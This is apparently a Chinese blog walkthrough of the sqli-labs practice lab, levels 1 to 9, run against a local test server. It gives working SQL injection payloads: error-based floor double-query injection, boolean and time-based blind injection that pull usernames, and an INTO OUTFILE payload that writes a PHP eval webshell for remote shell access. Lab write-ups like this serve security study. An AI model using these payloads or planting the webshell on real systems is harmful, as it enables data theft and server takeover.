目录

Less-1: 字符型注入

Less-2: 数字型注入

Less-3: 单引号字符型+括号

Less-4: 双引号字符型+括号

Less-5: 单引号字符型+固定输出信息 (floor报错注入&盲注)

Less-6: 双引号字符型+固定输出信息

Less-7: 写入文件

Less-8: Boolean型盲注

Less-9: 延时注入


先附上sqli的源代码:链接: https://pan.baidu.com/s/1d2rZVg5hz0ZBv2yg-UoArw 密码: 5w9y

我是在本地用phpstudy搭的一个环境。

Less-1: 字符型注入

输入  http://127.0.0.1/sqli/Less-1/?id=1'

发生了报错,可以知道存在注入,通过报错信息,我们可以猜到sql查询的源代码

select*from security where id=' $_GET[id] ' limit 0 ,1

我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。

http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #

//  and 1=2 就是注入点,我们就可以用工具进行注入了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# #

Less-2: 数字型注入

我们发现输入1 and 1=1 和 1 and 1=2 页面不一样,所以页面存在注入漏洞

http://127.0.0.1/sqli/Less-2/?id=1 and 1=1
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2

在后来的注入过程中,发现语句后面还有 limit 0 ,1 。所以可以猜到sql查询的源代码

select * from security where id=$_GET[id] limit 0,1

我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。

http://127.0.0.1/sqli/Less-2/?id=1 and 1=2 #

// and 1=2 就是注入点,我们就可以利用工具进行注入了
http://127.0.0.1/sqli/Less-2/?id=1 #inject# #

Less-3: 单引号字符型+括号

我们输入 http://127.0.0.1/sqli/Less-3/?id=3'出现了报错。

所以存在注入,从报错信息我们可以猜到sql查询源代码

select * from security where id=('$_GET[id]') limit 0,1

我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。

http://127.0.0.1/sqli/Less-3/?id=3') and 1=2 #

// and 1=2 就是注入点,我们就可以利用工具注入了
http://127.0.0.1/sqli/Less-3/?id=3') #inject# #

Less-4: 双引号字符型+括号

我们输入 http://127.0.0.1/sqli/Less-4/?id=1' 发现页面没有发生报错,猜想,可能是过滤了 ' 。

接着,我们再输入 http://127.0.0.1/sqli/Less-4/?id=1",页面报错,知道存在SQL注入。

从报错信息中我们可以猜到其sql查询源代码

select * from security where id=(" $_GET[id] ") limit 0,1

我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。

http://127.0.0.1/sqli/Less-4/?id=1") and 1=2 #

// and 1=2 就是注入点,我们就可以利用工具进行注入了
http://127.0.0.1/sqli/Less-4/?id=1") #inject# #

Less-5: 单引号字符型+固定输出信息 (floor报错注入&盲注)

输入 http://127.0.0.1/sqli/Less-5/?id=1'发现页面报错。

所以存在SQL注入,可以猜到sql查询的源代码。

select * from security where id='$_GET[id]' limit 0,1

咦,这不是和Less-1是一样的吗?哦不,页面显示的信息有点不一样!最后我们发现无论输入什么正确的信息,页面都只显示 You are in .....

于是我们猜测,页面的输出信息是固定的。当sql查询语句正确时,就返回一个固定的信息。当sql查询语句错误时,就不显示。当sql语句有错时,页面就会报出sql语句的错!为了验证这个,我们看下源代码。果然,证实了我们的猜想!

那么,这种情况下我们怎么进行注入呢?

这种情况union注入是行不通的。因为我们只能通过order by知道有3列,而不知道多少列是显示列。

那盲注呢,我们可以通过页面是否显示来判断我们的输入是否正确,当我们的sql正确时,就显示you are in....。当我们的sql语句错误是,就不显示。

我们找到了注入点之后就可以进行盲注了!

http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #
// and 1=2 就是注入点,我们就可以在注入点的位置插入判断语句了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# #

这题,我们网上的另一个好的解法就是利用双注入!双注入其实也就是floor报错注入。是利用count(),rand(),floor(),group by这几个函数结合在一起发生的漏洞,缺一不可!

双查询注入就是两个嵌套的查询,即 select  ....(select .....) ,里面的那个select被称为子查询,外面的那个select叫做父查询。执行顺序是先执行子查询,然后执行父查询。

下面是payload

// 我们可以将 user() 改成任何函数,以获取我们想要的信息
http://127.0.0.1/sqli/Less-1/?id=1' and (select 1 from (select count(*) from information_schema.tables group by concat(user(),floor(rand(0)*2)))a) # //将其分解
(select 1 from (Y)a) Y= select count(*) from information_schema.tables group by concat(Z) Z= user(),floor(rand(0)*2)

Less-6: 双引号字符型+固定输出信息

输入  http://127.0.0.1/sqli/Less-6/?id=1" 页面发生了报错

所以存在SQL注入,可以猜到sql查询的源代码。

select * from security where id="$_GET[id]" limit 0,1

可以利用 1"# 进行绕过,后来发现和Less-5一样,页面输出固定的信息。所以我们可以利用Less-5相同的解法,只不过把Less-5里面绕过的  '  换成 " 即可!

Less-7: 单引号+双括号

输入 1'  页面报错,但是没有提示出错原因,只是说有错误,很明显,是程序员把错误都给统一处理为You have an error in your SQL syntax 了。

于是猜测可能是字符型的,所以输入 1'# ,页面报错!心想,可能过滤了#,于是换成 1'--+ ,发现还是报错了,有可能把注释符都给过滤了吧!于是我们再输入 1' and '1'='2 看看页面的显示,如果页面不正常显示,说明就是字符型的注入了,只不过是把注释符都给过滤了。可是,页面显示正常!! 这就奇怪了,于是我偷偷的看了下源码,发现,参数用两个括号和单引号保护住了!

于是,我们可以这样构造payload

http://127.0.0.1/sqli/Less-7/?id=1')) and 1=2#

发现页面还是显示报错!

于是,我们继续看了下源代码!发现只有当我们的sql查询语句能查询到数据的时候,就返回固定的 You are in ... Use outfile......,当我们的sql查询语句错误或者返回的是空数据的时候,就返回固定的 You have an error in your SQL stntax。

那样的话,我们构造的payload就查询不到任何数据了。那么,这种情况下我们该如何解呢?我们看到当我们的sql语句能查询到数据的时候他的提示信息,  Use outfile ! 是不是要利用 outfile 这个函数呢?outfile 这个函数的用法是 select  A into outfile B 。意思就是将A写入B中,A可以是任意的文本内容,也可以是数据库查询到的数据,B是一个绝对路径的文件!

于是,我们可以构造这样的payload

// 意思就是读取表users的数据,写入到e盘的4.txt文件中
http://127.0.0.1/sqli/Less-7/?id=1')) union select * from users into outfile "e:\4.txt" # // 我们可以将一句话木马写入,然后用菜刀连接,获得shell
http://127.0.0.1/sqli/Less-7/?id=1')) union select 1,('<?php @eval($_POST[aa]) ?>'),3 into outfile "e:\5.txt" #

Less-8: Boolean型盲注

直接看源代码吧!

通过源代码我们知道,吧参数当成字符型处理。当sql查询语句正确的时候,返回You are in..... 当sql语句错误或没查询到任何数据时,不显示任何东西!所以,我们可以利用boolean行盲注来判断,根据页面是否显示数据来判断我们的sql语句是否正确!

boolean盲注就是利用 substring() ,ascii() ,length() 这几个函数,结合二分法来判断数据的!手工boolean盲注很麻烦,可以利用工具来进行盲注!下面给出盲注的基本代码

http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #

//  and 1=2 就是注入点,我们就可以用工具进行注入了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# # // 判断username列的第一个数据长度,第二个数据 limit 2,1 ,第三个数据 limit 3,1
http://127.0.0.1/sqli/Less-1/?id=-1' and (select length(username) from admin limit 1) >5 # // 判断username列的第一个数据的第一个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1' and (select ascii(username) from admin limit 1)>97 # // 判断username列的第一个数据的第2个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1' and (select ascii(substring(username,2,1)) from admin limit 1)>97 # // 判断username列的第二个数据的第2个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1' and (select ascii(substring(username,2,1)) from admin limit 2,1)>97 #

Less-9: 延时注入

直接看源代码

从源代码中我们知道,把参数当成了字符来处理。无论我们的查询语句是否正确,都返回固定的一个信息: You are in ...........

所以,这种情况下我们可以利用延时注入,根据页面的响应时间来判断我们的输入是否正确!延时注入主要是利用 if(条件,true时执行,false时执行) 函数。延时注入比boolean盲注更加的耗费时间,因为我们要时间等待页面的响应。所以,我们进行延时注入也一般是利用工具来注入!下面的延时注入的基本思路的代码

// 判断当前数据库的第一个字符的ascii是否大于100,如果大于100,页面立马响应,否则3秒后响应
http://127.0.0.1/sqli/Less-9/?id=1' and if (ascii(substr(database(),1,1))>100,1,sleep(3))#

Sqli 注入点解析的更多相关文章

  1. JavaScript中依赖注入详细解析

    计算机编程的世界其实就是一个将简单的部分不断抽象,并将这些抽象组织起来的过程.JavaScript也不例外,在我们使用JavaScript编写应用时,我们是不是都会使用到别人编写的代码,例如一些著名的 ...

  2. sqli注入--利用information_schema配合双查询报错注入

    目录 sqli-labs 5.6双查询报错注入通关 0x01 获取目标库名 0x02 获取库中表的数量 0x03 获取库中表名 0x04 获取目标表中的列数 0x05 获取目标表的列名 0x06 从列 ...

  3. SQL注入原理解析以及举例1

    sql注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作. sql注入漏洞产生满足条件: 1:用户能够控制数据的输入. 2:原本需要执行的代码 ...

  4. 框架学习笔记:深度解析StrangeIoC内部运行机制

    StrangeIoC的设计和RobotLegs一致,所以我的解析会对照RobotLegs来看. 整个框架使用的是MVCS的模式,关于MVCS模式大家可以点这里进行查看,这里就不谈了,既然Strange ...

  5. Spring 源码分析之 bean 依赖注入原理(注入属性)

         最近在研究Spring bean 生命周期相关知识点以及源码,所以打算写一篇 Spring bean生命周期相关的文章,但是整理过程中发现涉及的点太多而且又很复杂,很难在一篇文章中把Spri ...

  6. WEB 安全学习 一、mysql 注入漏洞

    转载: https://www.cnblogs.com/cui0x01/p/8620524.html 一.Mysql数据库结构 数据库A 表名 列名 数据 数据库B 表名 列名 数据 Mysql5.0 ...

  7. XML外部实体(XXE)注入详解

    ###XML与xxe注入基础知识 1.XMl定义 XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言:可扩展的样式语言(Ex ...

  8. ABP官方文档翻译 2.1 依赖注入

    依赖注入 什么是依赖注入 传统方式的问题 解决方案 构造函数注入模式 属性注入模式 依赖注入框架 ABP依赖注入基础设施 注册依赖注入 传统注册 帮助接口 自定义/直接注册 使用IocManager ...

  9. MSSQL注入:显错注入及反弹注入

    前言: MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路. MSSQL的显错注入操作: 以联合查询为例: 猜 ...

随机推荐

  1. 简单的ssm练手联手项目

    简单的ssm练手联手项目 这是一个简单的ssm整合项目 实现了汽车的品牌,价格,车型的添加 ,修改,删除,所有数据从数据库中拿取 使用到了jsp+mysql+Mybatis+spring+spring ...

  2. .NET并发编程-反应式编程

    本系列学习在.NET中的并发并行编程模式,实战技巧 本小节开始学习反应式编程.本系列保证最少代码呈现量,虽然talk is cheap, show me the code被奉为圭臬,我的学习习惯是,只 ...

  3. Nebula Storage 2.0 存储格式

    随着 2.0 各版本的陆续发布,Nebula Graph 迎来了一系列的改动,在存储方面,影响最大的改动就是底层编码格式进行了修改.Nebula Graph 的底层存储是基于 KV 保存在 Rocks ...

  4. SpringBoot源码修炼—系统初始化器

    SpringBoot源码修炼-系统初始化器 传统SSM框架与SpringBoot框架简要对比 SSM搭建流程 缺点: 耗时长 配置文件繁琐 需要找合适版本的jar包 SpringBoot搭建流程 优点 ...

  5. $.ajax data向后台传递参数失败 contentType: "application/json"

    在ajax方法设置中若不添加 contentType: "application/json" 则data可以是对象: $.ajax({ url: actionurl, type: ...

  6. 颠覆你认知的Python3.9

    我通读了python 3.9发行说明和相关的讨论.根据这些信息,我想写一个全面的指南,以便每个人都能一眼了解这些功能及其详细的工作原理 原文地址,点击这里,观看效果更佳 简而言之 从字典更新/合并到添 ...

  7. All I know about A/B Test (1) : 均值型指标与比值(率)型指标的计算区别

    因为最近在找实习,所以打算把自己之前学过的关数据分析的知识总结(复习)一下.在总结A/B test时,我发现中文互联网中关于A/B test的总结已经很多了,但是对于均值型指标和比值(率)型指标在设计 ...

  8. Ubuntu20.04linux内核(5.4.0版本)编译准备与实现过程-编译过程(2)

    前面因为博客园维修,所以内核编译过程一直没有发出来,现在把整个内核过程分享出来.本随笔给出内核的编译实现过程,在编译前需要参照我前面一篇随笔: Ubuntu20.04linux内核(5.4.0版本)编 ...

  9. 【odoo14】第二十三章、管理邮件

    邮件集成是odoo最重要的特性.我们可以通过odoo收发邮件.我们甚至可以管理业务文档上的电子邮件,如潜在客户.销售订单和项目.本章,我们将探讨在odoo中处理邮件的方式. 配置邮件服务器 管理文档中 ...

  10. 20184307 实验三 Socket编程技术

    实验三 Socket编程技术 学号 20184307 2019-2020-2 <Python程序设计>实验三报告 课程:<Python程序设计> 班级:1843 姓名:章森洋 ...